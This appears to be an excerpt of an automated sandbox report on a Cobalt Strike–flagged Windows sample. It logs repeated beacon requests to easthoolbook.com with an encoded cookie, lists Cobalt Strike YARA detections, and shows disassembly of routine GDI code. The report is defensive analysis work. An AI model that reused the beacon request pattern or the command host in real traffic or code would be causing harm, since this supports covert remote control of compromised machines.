                                                                          2024-04-19 13:32:52 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.64974689.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:56 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:57 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:15 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:57 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.64974789.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:59 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:33:00 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:18 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:33:00 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:15:30:56
                                                                          Start date:19/04/2024
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe"
                                                                          Imagebase:0x140000000
                                                                          File size:3'636'736 bytes
                                                                          MD5 hash:C720C50306558112B389EF44CFF494F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:0.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:28.9%
                                                                            Total number of Nodes:218
                                                                            Total number of Limit Nodes:31
                                                                            execution_graph 107402 140003334 107405 140074010 107402->107405 107408 140075108 107405->107408 107407 140003344 107409 14007512f 107408->107409 107410 1400751bc 107408->107410 107411 140075159 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 107409->107411 107410->107407 107417 140075e0c GetSysColor 107411->107417 107415 1400751b4 107553 14007521c 8 API calls 107415->107553 107418 140075e4e GetSysColor 107417->107418 107419 140075e42 GetSysColor 107417->107419 107421 140075e78 107418->107421 107422 140075e69 GetSysColor 107418->107422 107419->107418 107554 140049910 107421->107554 107422->107421 107425 140075fdf 107427 140076003 GetSysColorBrush 107425->107427 107426 140075fea GetSysColor 107426->107427 107428 140076017 107427->107428 107429 14007601d GetSysColorBrush 107427->107429 107567 140035158 _CxxThrowException 107428->107567 107431 140076037 GetSysColorBrush 107429->107431 107432 140076031 107429->107432 107435 140076050 107431->107435 107436 14007604b 107431->107436 107568 140035158 _CxxThrowException 107432->107568 107560 14004a6cc 107435->107560 107569 140035158 _CxxThrowException 107436->107569 107441 140076074 _DeleteExceptionPtr 107442 14004a6cc _DeleteExceptionPtr DeleteObject 107441->107442 107443 140076083 CreateSolidBrush 107442->107443 107444 140076097 _DeleteExceptionPtr 107443->107444 107445 14004a6cc _DeleteExceptionPtr DeleteObject 107444->107445 107446 1400760a6 CreateSolidBrush 107445->107446 107447 1400760bd _DeleteExceptionPtr 107446->107447 107448 14004a6cc _DeleteExceptionPtr DeleteObject 107447->107448 107449 1400760cc CreateSolidBrush 107448->107449 107450 1400760e3 _DeleteExceptionPtr 107449->107450 107451 14004a6cc _DeleteExceptionPtr DeleteObject 107450->107451 107452 1400760f2 CreateSolidBrush 107451->107452 107453 140076106 _DeleteExceptionPtr 107452->107453 107454 14004a6cc _DeleteExceptionPtr DeleteObject 107453->107454 107455 140076115 CreateSolidBrush 107454->107455 107456 140076129 _DeleteExceptionPtr 107455->107456 107457 14004a6cc _DeleteExceptionPtr DeleteObject 107456->107457 107458 140076138 CreateSolidBrush 107457->107458 107459 14007614c _DeleteExceptionPtr 107458->107459 107460 14004a6cc _DeleteExceptionPtr DeleteObject 107459->107460 107461 14007615b CreatePen 107460->107461 107462 140076177 _DeleteExceptionPtr 107461->107462 107463 14004a6cc _DeleteExceptionPtr DeleteObject 107462->107463 107464 140076186 CreatePen 107463->107464 107465 1400761a2 _DeleteExceptionPtr 107464->107465 107466 14004a6cc _DeleteExceptionPtr DeleteObject 107465->107466 107467 1400761b1 CreatePen 107466->107467 107469 1400761cd _DeleteExceptionPtr 107467->107469 107468 1400761e8 107470 1400761f1 CreateSolidBrush 107468->107470 107471 140076250 107468->107471 107469->107468 107473 14004a6cc _DeleteExceptionPtr DeleteObject 107469->107473 107478 14007624e _DeleteExceptionPtr 107470->107478 107570 1400748f4 GetSysColor CreateDIBitmap 107471->107570 107473->107468 107474 14007625d 107475 140076267 _DeleteExceptionPtr 107474->107475 107571 140035158 _CxxThrowException 107474->107571 107477 140076287 CreatePatternBrush 107475->107477 107480 14007629d _DeleteExceptionPtr 107477->107480 107564 140049a98 107478->107564 107572 1400499f8 107480->107572 107481 1400751ac 107483 1400757a8 107481->107483 107484 140049910 _DeleteExceptionPtr 3 API calls 107483->107484 107485 1400757fb GetDeviceCaps 107484->107485 107486 140075834 _DeleteExceptionPtr 107485->107486 107487 140075870 DeleteObject 107486->107487 107488 140075879 _DeleteExceptionPtr 107486->107488 107487->107488 107489 140075893 DeleteObject 107488->107489 107490 14007589c _DeleteExceptionPtr 107488->107490 107489->107490 107491 1400758b6 DeleteObject 107490->107491 107492 1400758bf _DeleteExceptionPtr 107490->107492 107491->107492 107493 1400758e2 _DeleteExceptionPtr 107492->107493 107494 1400758d9 DeleteObject 107492->107494 107496 1400758fc DeleteObject 107493->107496 107497 140075905 _DeleteExceptionPtr 107493->107497 107494->107493 107495 14007596f _DeleteExceptionPtr 107504 140075992 _DeleteExceptionPtr 107495->107504 107507 140075989 DeleteObject 107495->107507 107496->107497 107498 140075920 DeleteObject 107497->107498 107499 140075929 _DeleteExceptionPtr 107497->107499 107498->107499 107500 14007594c _DeleteExceptionPtr 107499->107500 107502 140075943 DeleteObject 107499->107502 107500->107495 107503 140075966 DeleteObject 107500->107503 107501 1400759b6 SystemParametersInfoW 107505 1401cf650 107501->107505 107502->107500 107503->107495 107504->107501 107509 1400759ad DeleteObject 107504->107509 107506 1400759ec GetTextCharsetInfo 107505->107506 107508 140075a2a lstrcpyW 107506->107508 107507->107504 107511 140075ad8 CreateFontIndirectW 107508->107511 107512 140075a5f 107508->107512 107509->107501 107518 140075aee _DeleteExceptionPtr 107511->107518 107512->107511 107513 140075a68 EnumFontFamiliesW 107512->107513 107514 140075a87 lstrcpyW 107513->107514 107515 140075aa0 EnumFontFamiliesW 107513->107515 107514->107511 107516 140075ad2 lstrcpyW 107515->107516 107517 140075acb 107515->107517 107516->107511 107517->107516 107519 140075b23 CreateFontIndirectW 107518->107519 107577 14004a570 107519->107577 107521 140075b39 SystemParametersInfoW CreateFontIndirectW 107522 14004a570 _DeleteExceptionPtr 107521->107522 107523 140075b9c CreateFontIndirectW 107522->107523 107524 14004a570 _DeleteExceptionPtr 107523->107524 107525 140075bcf CreateFontIndirectW 107524->107525 107526 14004a570 _DeleteExceptionPtr 107525->107526 107527 140075bf6 GetSystemMetrics lstrcpyW CreateFontIndirectW 107526->107527 107528 14004a570 _DeleteExceptionPtr 107527->107528 107529 140075c40 GetStockObject 107528->107529 107530 140075cf4 GetStockObject 107529->107530 107531 140075c6d GetObjectW 107529->107531 107579 14004a884 107530->107579 107531->107530 107533 140075c83 lstrcpyW CreateFontIndirectW 107531->107533 107535 14004a570 _DeleteExceptionPtr 107533->107535 107534 140075d07 GetObjectW CreateFontIndirectW 107536 14004a570 _DeleteExceptionPtr 107534->107536 107537 140075cda CreateFontIndirectW 107535->107537 107539 140075d36 CreateFontIndirectW 107536->107539 107538 14004a570 _DeleteExceptionPtr 107537->107538 107538->107530 107540 140075d59 _DeleteExceptionPtr 107539->107540 107587 1400762d4 107540->107587 107542 140075da8 107545 1400499f8 _DeleteExceptionPtr DeleteObject 107542->107545 107543 140075daf 107600 140035158 _CxxThrowException 107543->107600 107549 140075dcc 107545->107549 107546 140075d61 107546->107542 107546->107543 107547 140075daa 107546->107547 107598 1400414f8 _CxxThrowException Concurrency::details::ExternalContextBase::~ExternalContextBase 107546->107598 107599 140035158 _CxxThrowException 107547->107599 107551 140049a98 _DeleteExceptionPtr ReleaseDC 107549->107551 107552 140075dd7 107551->107552 107552->107415 107553->107410 107555 140049943 GetWindowDC 107554->107555 107557 140049960 _DeleteExceptionPtr 107555->107557 107558 140049969 22 API calls 107557->107558 107575 14004a4cc _CxxThrowException _CxxThrowException 107557->107575 107558->107425 107558->107426 107561 14004a6d7 CreateSolidBrush 107560->107561 107562 14004a6de _DeleteExceptionPtr 107560->107562 107561->107441 107563 14004a6e3 DeleteObject 107562->107563 107576 14004a728 std::ios_base::~ios_base 107564->107576 107566 140049ab9 ReleaseDC 107570->107474 107573 14004a6cc _DeleteExceptionPtr DeleteObject 107572->107573 107574 140049a29 107573->107574 107574->107478 107576->107566 107578 14004a57e _DeleteExceptionPtr 107577->107578 107578->107521 107580 14004a897 107579->107580 107586 14004c624 _DeleteExceptionPtr 107580->107586 107601 14003a1b0 _CxxThrowException Concurrency::details::ExternalContextBase::~ExternalContextBase 107580->107601 107582 14004c634 107582->107586 107602 14003a1b0 _CxxThrowException Concurrency::details::ExternalContextBase::~ExternalContextBase 107582->107602 107584 14004c649 _DeleteExceptionPtr 107584->107586 107603 14003517c _CxxThrowException 107584->107603 107586->107534 107588 140049910 _DeleteExceptionPtr 3 API calls 107587->107588 107590 140076312 107588->107590 107589 140076331 GetTextMetricsW 107592 14004aedc 107589->107592 107590->107589 107604 140035158 _CxxThrowException 107590->107604 107594 140076375 GetTextMetricsW 107592->107594 107595 1400763ac 107594->107595 107596 140049a98 _DeleteExceptionPtr ReleaseDC 107595->107596 107597 1400763b6 107596->107597 107597->107546 107598->107546 107601->107582 107602->107584 107605 1401e923c 107617 1401ec964 EnterCriticalSection 107605->107617 107618 1400030a8 107621 1400373a8 107618->107621 107625 1400375d4 8 API calls 107621->107625 107626 1400043b0 107627 1400367c4 107626->107627 107630 1400362c4 107627->107630 107629 1400367d6 107629->107629 107645 140037a7c 107630->107645 107632 1400362db 107635 1400362e0 107632->107635 107655 140035158 _CxxThrowException 107632->107655 107634 140036301 107634->107629 107635->107634 107656 140035158 _CxxThrowException 107635->107656 107646 140037aa0 107645->107646 107648 140037aa5 107645->107648 107676 140035158 _CxxThrowException 107646->107676 107650 140037aee 107648->107650 107654 140037ada 107648->107654 107677 140035158 _CxxThrowException 107648->107677 107650->107632 107651 140037ae3 107651->107650 107678 140035158 _CxxThrowException 107651->107678 107657 1400377cc EnterCriticalSection 107654->107657 107658 140037801 107657->107658 107660 1400378ee 107658->107660 107661 140037874 GlobalHandle GlobalUnlock 107658->107661 107662 140037850 107658->107662 107659 140037901 LeaveCriticalSection 107659->107651 107660->107659 107665 140037945 107661->107665 107666 14003789b GlobalReAlloc 107661->107666 107663 140037865 GlobalAlloc 107662->107663 107664 14003793b 107662->107664 107668 1400378ac 107663->107668 107679 140006230 25 API calls 4 library calls 107664->107679 107680 140006230 25 API calls 4 library calls 107665->107680 107666->107668 107670 1400378c3 GlobalLock 107668->107670 107671 1400378b1 107668->107671 107670->107660 107672 140037951 GlobalHandle GlobalLock 107671->107672 107673 140037960 LeaveCriticalSection 107671->107673 107672->107673 107681 14003517c _CxxThrowException 107673->107681 107679->107665 107680->107671 107682 1400034e0 107685 140145ee4 107682->107685 107688 140144ab0 107685->107688 107687 1400034f0 107693 140048244 107688->107693 107690 140144acb 107691 140144b10 GetProfileIntW GetProfileIntW 107690->107691 107692 140144b5a 107690->107692 107691->107692 107692->107687 107694 1400362c4 shared_ptr 36 API calls 107693->107694 107695 140048252 107694->107695 107695->107690

                                                                            Executed Functions

                                                                            Function 00000001400757A8 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 384stringCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1400757a8-140075832 call 140049910 GetDeviceCaps 3 140075834-140075840 0->3 4 140075853-140075860 0->4 3->4 5 140075842-14007584c 3->5 6 140075862-140075866 4->6 7 140075879-140075883 4->7 5->4 6->7 10 140075868-140075873 call 14004a78c DeleteObject 6->10 8 140075885-140075889 7->8 9 14007589c-1400758a6 7->9 8->9 11 14007588b-140075896 call 14004a78c DeleteObject 8->11 12 1400758a8-1400758ac 9->12 13 1400758bf-1400758c9 9->13 10->7 11->9 12->13 17 1400758ae-1400758b9 call 14004a78c DeleteObject 12->17 18 1400758e2-1400758ec 13->18 19 1400758cb-1400758cf 13->19 17->13 20 140075905-14007590f 18->20 21 1400758ee-1400758f2 18->21 19->18 24 1400758d1-1400758dc call 14004a78c DeleteObject 19->24 26 140075911-140075916 20->26 27 140075929-140075933 20->27 21->20 25 1400758f4-1400758ff call 14004a78c DeleteObject 21->25 24->18 25->20 26->27 31 140075918-140075923 call 14004a78c DeleteObject 26->31 32 140075935-140075939 27->32 33 14007594c-140075956 27->33 31->27 32->33 39 14007593b-140075946 call 14004a78c DeleteObject 32->39 35 140075958-14007595c 33->35 36 14007596f-140075979 33->36 35->36 40 14007595e-140075969 call 14004a78c DeleteObject 35->40 41 140075992-14007599c 36->41 42 14007597b-14007597f 36->42 39->33 40->36 47 1400759b6-140075a28 SystemParametersInfoW call 1401cf650 GetTextCharsetInfo 41->47 48 14007599e-1400759a3 41->48 42->41 46 140075981-14007598c call 14004a78c DeleteObject 42->46 46->41 57 140075a31-140075a35 47->57 58 140075a2a-140075a2f 47->58 48->47 52 1400759a5-1400759b0 call 14004a78c DeleteObject 48->52 52->47 60 140075a37 57->60 61 140075a39-140075a5d lstrcpyW 57->61 58->61 60->61 62 140075ad8-140075b1b CreateFontIndirectW call 14004a570 call 1401e6f4c 61->62 63 140075a5f-140075a66 61->63 73 140075b23-140075c67 CreateFontIndirectW call 14004a570 SystemParametersInfoW CreateFontIndirectW call 14004a570 CreateFontIndirectW call 14004a570 CreateFontIndirectW call 14004a570 GetSystemMetrics lstrcpyW CreateFontIndirectW call 14004a570 GetStockObject 62->73 74 140075b1d-140075b1f 62->74 63->62 64 140075a68-140075a85 EnumFontFamiliesW 63->64 66 140075a87-140075a9e lstrcpyW 64->66 67 140075aa0-140075ac9 EnumFontFamiliesW 64->67 66->62 69 140075ad2 lstrcpyW 67->69 70 140075acb 67->70 69->62 70->69 85 140075cf4-140075d68 GetStockObject call 14004a884 GetObjectW CreateFontIndirectW call 14004a570 CreateFontIndirectW call 14004a570 call 1400762d4 73->85 86 140075c6d-140075c81 GetObjectW 73->86 74->73 99 140075da3-140075da6 85->99 86->85 88 140075c83-140075cef lstrcpyW CreateFontIndirectW call 14004a570 CreateFontIndirectW call 14004a570 86->88 88->85 100 140075da8 99->100 101 140075d6a-140075d70 99->101 102 140075db6-140075dc7 call 1400499f8 100->102 103 140075d72-140075d7c 101->103 104 140075db0-140075db5 call 140035158 101->104 111 140075dcc-140075e0b call 140049a98 call 1401cb5d0 102->111 107 140075d7e-140075d8a call 1400414f8 103->107 108 140075daa-140075daf call 140035158 103->108 104->102 107->99 117 140075d8c-140075d9e call 1401cc2e4 107->117 108->104 117->99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$InfoSystem$EnumFamiliesParametersStock$CapsCharsetDeviceMetricsTextWindow
                                                                            • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                            • API String ID: 1948770699-1395034203
                                                                            • Opcode ID: c56c575decf0d09262d632f7c37735480c17fdc26898bc6c9f0f7bc4366ace97
                                                                            • Instruction ID: 68dedb83c74c12985681789053b3080d52f262c267dbe6659b6e850852debccd
                                                                            • Opcode Fuzzy Hash: c56c575decf0d09262d632f7c37735480c17fdc26898bc6c9f0f7bc4366ace97
                                                                            • Instruction Fuzzy Hash: 1B02C036204B8196EB56EF22E4587DA77A1F78DB80F44412AEB4A477B4DFBCC949C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140075E0C Relevance: 63.3, APIs: 42, Instructions: 302COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 122 140075e0c-140075e40 GetSysColor 123 140075e52 122->123 124 140075e42-140075e4c GetSysColor 122->124 126 140075e54-140075e67 GetSysColor 123->126 124->123 125 140075e4e-140075e50 124->125 125->126 127 140075e7c 126->127 128 140075e69-140075e76 GetSysColor 126->128 129 140075e7e-140075fdd call 140049910 GetDeviceCaps GetSysColor * 21 127->129 128->127 130 140075e78-140075e7a 128->130 133 140075fdf-140075fe8 129->133 134 140075fea-140075ffc GetSysColor 129->134 130->129 135 140076003-140076015 GetSysColorBrush 133->135 134->135 136 140076017-14007601c call 140035158 135->136 137 14007601d-14007602f GetSysColorBrush 135->137 136->137 139 140076037-140076049 GetSysColorBrush 137->139 140 140076031-140076036 call 140035158 137->140 143 140076051-1400761d7 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreateSolidBrush call 14004a570 call 14004a6cc CreatePen call 14004a570 call 14004a6cc CreatePen call 14004a570 call 14004a6cc CreatePen call 14004a570 139->143 144 14007604b-140076050 call 140035158 139->144 140->139 188 1400761e8-1400761ef 143->188 189 1400761d9-1400761de 143->189 144->143 191 1400761f1-14007624e CreateSolidBrush call 14004a570 188->191 192 140076250-140076260 call 1400748f4 188->192 189->188 190 1400761e0-1400761e3 call 14004a6cc 189->190 190->188 198 1400762ad-1400762d1 call 1400b4e48 call 140049a98 191->198 199 140076268-1400762a8 call 14004a570 CreatePatternBrush call 14004a570 call 1400499f8 192->199 200 140076262-140076267 call 140035158 192->200 199->198 200->199
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreate$Solid$CapsDevicePattern
                                                                            • String ID:
                                                                            • API String ID: 3066057030-0
                                                                            • Opcode ID: 55e63baadf1953b7b357c020304154dc6c912f1b5b46dea6436ebc6df18dbf04
                                                                            • Instruction ID: 25b3ba93feb23922009906762e9c7d5486f4d693ac2e51633c3e63fed6e34798
                                                                            • Opcode Fuzzy Hash: 55e63baadf1953b7b357c020304154dc6c912f1b5b46dea6436ebc6df18dbf04
